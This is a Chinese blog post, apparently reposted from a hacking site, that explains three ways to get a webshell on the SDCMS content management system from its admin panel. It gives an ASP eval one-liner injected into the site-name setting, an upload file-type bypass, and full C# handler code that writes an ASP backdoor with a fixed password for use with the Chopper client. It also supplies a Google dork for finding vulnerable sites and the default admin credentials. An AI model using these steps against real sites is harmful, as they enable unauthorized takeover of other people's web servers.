SDcms后台拿webshell

最新推荐文章于 2023-09-15 11:19:40 发布
最新推荐文章于 2023-09-15 11:19:40 发布
阅读量4.7k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: file class asp c# 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6587032
版权

第一种方法


进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("80lr")'    //密码为80lr
用菜刀链接http://www.80lr.com/inc/const.asp  就搞定了。


第二种方法


进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!


第三种方法


进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容:
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"80lr\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
访问这个地址:http://www.80lr.com/skins/2009/getshell.ashx 
会在http://www.80lr.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为80lr 用菜刀链接



送上关键词:intitle:"Powered By SDCMS"
后台http://www.80lr.com/admin/   默认用户和密码:sdcms
本文来自易寒网络,转载务必注明原文链接:http://www.80lr.com/oday/241.html

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sdcms_php_web,SDCMS通杀漏洞
weixin_28787801的博客
04-07 1145
作者:T00LS 鬼哥漏洞文件:后台目录/index.asp作者声明:转载请注明 T00ls 鬼哥Sub CheckDim username,password,code,getcode,RsIF Check_post Then Echo "1禁止从外部提交数据!":Exit Subusername=FilterText(Trim(Request.Form("username")),1)passwo...
SDCMS靶场漏洞挖掘
最新发布
huohaowen的博客
12-25 1668
本篇blog主要是sdcms靶场的漏洞挖掘
sdcms3.3门户版asp程序完整版.zip
09-04
后台地址:/admin 账户:admin 密码:fcuwqvcgri ,价值499元的sdcms3.3门户版程序
45种可以拿到Webshell的程序
jahn的专栏
10-26 8653
   到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!---我看了下..真的很多...可以用这个..asp?="pig" 呵呵`~2,到Google ,site:cq.cn inurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用or=or来登陆4,关键字:Co Net
靶场练习——SDcms文件上传漏洞靶场
p36273的博客
09-15 1058
今次练习的是SDcms靶场,该靶场是一个文件上传漏洞系列的靶场,靶场如下: 如图所示,登录页面参数是?m=login尝试把上面URL的参数login改成admin,如下图,进入成功。 这里第一反应使用了账号密码爆破,发现对访问的IP有限制,一旦超过错误访问次数,就会被限制登录,图片如下: 使用账号密码admin/admin,成登录网站后台 找到如图所示的文件上传点 如图找到文件上传的路径:/upfile/2023/09/在Burp中把 .jpg 改成 .php,然后再文件内容中添加GIF89a头部,发现ph
SDCMS 1.1sp1的XSS漏洞的挖掘与利用
weixin_33759269的博客
05-18 380
本文已发《黑客防线》第六期(转载请注明) SDCMS全称:时代网站信息管理系统。SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统。永久免费,开源! SDCMS以信息为主题,通过以文字和图片标题为起点,以无限栏目分类为支撑,配合多项插件的灵活使用,以达到信息门户的远景! SDCMS总结各类信息门户的现状,充分考虑符合站长需求的前提下。设计了灵活多变的标签调用方式,满足了不同层次...
sdcms3.1.zip
04-05
sdcms3.1.zip sdcms3.1.zip sdcms3.1.zip
SDCMS 企业商业版2.0版本
09-19
SDCMS(Smart Disc Content Management System)企业商业版2.0是一个专门为中小企业打造的网站内容管理系统。这个版本在原有的基础上进行了大量的优化,旨在提供更高效、更便捷的网站建设和管理体验。接下来,我们将...
SDCMS付费版源码
10-04
在描述中提到的"后台很好用,响应速度快,很稳定",这表明SDCMS的企业版源码在系统性能上有着出色的表现。其后台管理系统设计得直观易用,使得管理员能够快速地进行内容更新、用户管理、权限设置等操作。同时,系统...
sdcmshuiyuan.rar_sdcms
09-24
SDCMS的会员功能插件,很多人在找这个插件。所以我上传了上来。
sdcms2.0文章采集插件
03-10
找了好久,才找到的sdcms可用的采集插件
sdcms asp采集插件 2.0版本以上可用
09-12
sdcms采集插件2.0版本以上可以用 文章采集插件 sdcms采集插件2.0版本以上可以用 文章采集插件
sdcms数据库备份插件3.0
05-16
sdcms时代网站信息管理系统门户版3.0以上,企业版2.0以上的版本使用
SDCMS v1.2 UTF8.rar
07-05
一.新增功能 1.增加了搜索管理功能,可以记录用户搜索的关键字并进行管理; 2.增加了匿名用户投稿功能,用户前台投稿,管理后台审核; 3.增加了Digg插件功能,默认支持顶和踩,同时可以开发出更多效果; 4.增加附件批量上传功能; 5.增加了图片水印及缩略图功能; 6.增加了信息管理的类别转移功能; 7.增加了模板文件化管理功能; 8.增加了蜘蛛来访记录功能,可以随时了解蜘蛛的来访时间; 9.增加了信息来源功能和对信息自动截取描述内容长度的管理; 10.友情链接增加了标识功能,可以根据标识来调用; 11.增加专题管理功能,更加丰富页面表现形式; 12.增加对附件上传的大小和文件类型的限制; 13.广告插件增加了对代码广告的支持,增加了广告类别功能; 14.信息管理增加了使用拼音作文件名的功能; 15.静态标签增加了标签说明功能; 16.管理用户增加了笔名功能,用于信息发布的作者; 17.内连接增加了替换次数的限定; 18.Tag标签增加了分页功能; 19.网站地图增加了对单页的支持; 20.增加了申请链接的功能; 21.信息增加了引用和代码运行的功能; 22.增加了系统事务日志的开关功能。 二.修正的Bug 1.修复了留言和评论插件存在的Bug; 2.修复了在虚拟目录下使用单页造成的路径问题; 3.修复了Tag标签不能被删除的Bug; 4.修复了因图片过大而无法全部显示的Bug; 5.修复了搜索因日文假名片造成不正常运行的Bug; 6.修复了其他已知Bug。 三.调整的功能 1.改进了系统模板引擎,新模板引擎调用更灵活方便(这也是1.2版本最大的改动); 2.系统配置文件只保留了部分参数保存进数据库,其他的直接生成配置文件; 3.系统主要配置全部可以后台管理,无需手动更改配置文件; 4.普通系统管理员的权限进行了细致的划分,更加明确权限和分工; 5.改用xhEditor作为SDCMS的默认编辑器,取消对Ewebeditor编辑器的支持; 6.改进了类别、单页的模板选择方式; 7.信息的相关文章改为可以根据标签获得和指定ID的两种形式; 8.广告插件管理调用由标签改为JS调用,并删除了广告组功能; 9.取消了对动态标签的支持; 10.改进了生成管理的表现形式和使用方式; 11.后台用户登陆验证方式作了调整,增加系统安全性; 12.内链接功能进行了进一步修复和完善。
sdcms时代网站信息管理系统 v2.2 企业版
12-07
SDCMS企业版主要包含:文章、单图、商品、招聘、下载、单页、外链、定时发布、手机版、自定义字段、自定义表单等模块,系统内置评论,留言,心情,搜索,标签,7年企业网站建设经验为您精心打造,是您快速建立中小营销型企业网站的良好选择。 时代网站信息管
sdcms.rar_idcms_sdcms
09-24
这是一个JAVA EE 开发的实例源代码,可以认真的阅读和修改
SDcms1.8代码审计
weixin_30480583的博客
06-12 196
由于工作原因,分析了很多的cms也都写过文章,不过觉得好像没什么骚操作都是网上的基本操作,所以也就没发表在网站上,都保存在本地。最近突然发现自己博客中实战的东西太少了,决定将以前写的一些文章搬过来,由于当时写的初愿是给自己留个记录,以后方便查看,所以写的都很简单,只有代码审计和复现,没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的 ---------------------------...
sdcms代码审计之sql注入
willow_liang的博客
10-30 1716
1.漏洞注入点分析(黑名单 ) 2.注入payload构造(双参数构造,sqlmap绕过) 注册账号后发现网站有在线留言功能,可以查看能否注入 查看F函数 #F函数(get和post) function F($a,$b='') { $a=strtolower($a); if(!strpos($a,'.')) { $method='other'; } else { list($method,$a)=explode('.',$a,2); } switch ($method) {
验证码绕过、密码找回漏洞简介
seek_2022的博客
06-05 1097
本文首先介绍验证码绕过的常见姿势及密码找回漏洞,通过本地搭建cms进行测试,确定漏洞的利用方法,并在相应的靶场上进行漏洞复现,演示了验证码漏洞的利用过程
SDCMS-B2C商城网站管理系统
06-10
SDCMS-B2C商城网站管理系统是一款开源的B2C电子商务网站管理系统,基于PHP+MySQL架构,提供了完整的网站建设、管理和运营解决方案。该系统具有多种功能和特点,包括: 1. 产品管理:支持产品分类、品牌、属性、规格等多种管理方式,方便快捷地管理产品信息。 2. 订单管理:支持订单查询、发货、退货、退款等多种操作,方便管理订单流程。 3. 用户管理:支持注册、登录、个人中心等多种管理方式,方便用户管理。 4. 购物车:支持购物车管理和结算功能,方便用户下单购买商品。 5. 支付管理:支持多种支付方式,包括支付宝、微信支付等,方便用户进行支付。 6. 促销管理:支持限时折扣、满减、赠品等多种促销活动,方便营销推广。 7. SEO优化:支持SEO优化功能,包括URL优化、关键字设置等,提高网站在搜索引擎中的排名。 8. 模板管理:支持多种模板和皮肤,方便用户进行个性化定制。 9. 数据统计:支持数据统计和分析功能,方便用户进行数据分析和决策。 如果您需要使用SDCMS-B2C商城网站管理系统,可以在官网或者GitHub上下载源码,并根据安装说明进行安装和配置。注意,使用该系统需要一定的技术基础和开发经验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值